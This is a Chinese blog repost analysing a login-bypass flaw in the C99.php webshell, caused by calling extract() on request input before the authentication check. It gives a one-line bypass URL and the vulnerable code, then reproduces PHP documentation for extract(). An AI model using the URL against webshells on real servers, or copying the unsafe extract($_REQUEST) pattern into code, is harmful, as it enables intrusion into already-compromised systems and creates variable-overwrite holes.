最新消息:

C99.PHP webshell 绕过登陆密码漏洞(extract函数导致变量覆盖漏洞)

PHP admin 3166浏览 0评论

From: Every C99.php Shell Is Backdoored (A.K.A. Free Shells for Everyone!)

C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。

http://127.0.0.1/c99.php?c99shcook[login]=0

可直接登陆。

漏洞原因是,错误的使用了extract()导致变量覆盖漏洞,即下面代码:

@extract($_REQUEST["c99shcook"]);

正好在验证登陆语句的前面,而验证登陆的代码为:

if ($login) {
    if (empty($md5_pass)) {
        $md5_pass = md5($pass);
    }
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
         if ($login_txt === false) {
            $login_txt = "";
        } elseif (empty($login_txt)) {
            $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html));
         }
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
         header("HTTP/1.0 401 Unauthorized");
        exit($accessdeniedmess);
    }
}

转自:http://lcx.cc/?i=4381  和http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/。

 

ps:在php中extract() 函数从数组中把变量导入到当前的符号表中。 对于数组中的每个元素,键名用于变量名,键值用于变量值。

语法

extract(array,extract_rules,prefix)
参数 描述
array 必需。规定要使用的输入。
extract_rules 可选。extract() 函数将检查每个键名是否为合法的变量名,同时也检查和符号表中的变量名是否冲突。

对非法、数字和冲突的键名的处理将根据此参数决定。可以是以下值之一:

可能的值:

  • EXTR_OVERWRITE – 默认。如果有冲突,则覆盖已有的变量。
  • EXTR_SKIP – 如果有冲突,不覆盖已有的变量。(忽略数组中同名的元素)
  • EXTR_PREFIX_SAME – 如果有冲突,在变量名前加上前缀 prefix。自 PHP 4.0.5 起,这也包括了对数字索引的处理。
  • EXTR_PREFIX_ALL – 给所有变量名加上前缀 prefix(第三个参数)。
  • EXTR_PREFIX_INVALID – 仅在非法或数字变量名前加上前缀 prefix。本标记是 PHP 4.0.5 新加的。
  • EXTR_IF_EXISTS – 仅在当前符号表中已有同名变量时,覆盖它们的值。其它的都不处理。可以用在已经定义了一组合法的变量,然后要从一个数组例如 $_REQUEST 中提取值覆盖这些变量的场合。本标记是 PHP 4.2.0 新加的。
  • EXTR_PREFIX_IF_EXISTS – 仅在当前符号表中已有同名变量时,建立附加了前缀的变量名,其它的都不处理。本标记是 PHP 4.2.0 新加的。
  • EXTR_REFS – 将变量作为引用提取。这有力地表明了导入的变量仍然引用了 var_array 参数的值。可以单独使用这个标志或者在 extract_type 中用 OR 与其它任何标志结合使用。本标记是 PHP 4.3.0 新加的。
prefix 可选。请注意 prefix 仅在 extract_type 的值是 EXTR_PREFIX_SAME,EXTR_PREFIX_ALL,EXTR_PREFIX_INVALID 或 EXTR_PREFIX_IF_EXISTS 时需要。如果附加了前缀后的结果不是合法的变量名,将不会导入到符号表中。

前缀和数组键名之间会自动加上一个下划线。

本函数返回成功设置的变量数目。

转载请注明:jinglingshu的博客 » C99.PHP webshell 绕过登陆密码漏洞(extract函数导致变量覆盖漏洞)


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址